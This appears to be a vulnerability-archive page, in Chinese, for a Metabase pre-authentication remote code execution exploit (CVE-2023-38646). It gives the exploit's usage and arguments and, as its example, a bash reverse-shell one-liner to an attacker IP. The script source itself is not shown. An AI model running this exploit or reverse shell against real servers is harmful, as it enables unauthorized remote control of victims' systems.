关联漏洞
标题:
Metabase 安全漏洞
(CVE-2023-38646)
描述:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
描述
Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)
介绍
# Metabase Pre-Auth RCE (CVE-2023-38646) POC
This is a python script which exploits the remote code execution vulnerability of Metabase's login software. It allows us to execute arbitrary commands on the server before authentication.
Vulnerable versions are Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1
## Usage
```
python3 exploit.py -u URL -t TOKEN -c COMMAND
```
## Arguments
```
-h, --help show this help message and exit
-u URL, --url URL Target URL
-t TOKEN, --token TOKEN
Setup-Token found in /api/session/properties
-c COMMAND, --command COMMAND
Command to be executed in the target host
```
## Example
Command used: `bash -i >& /dev/tcp/10.10.14.26/9001 0>&1`
## References
[Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)
文件快照
[4.0K] /data/pocs/2c4d0840ca17a21fb0c7386ccee1f2c0982e305f
├── [1.8K] exploit.py
├── [ 11K] LICENSE
└── [1009] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。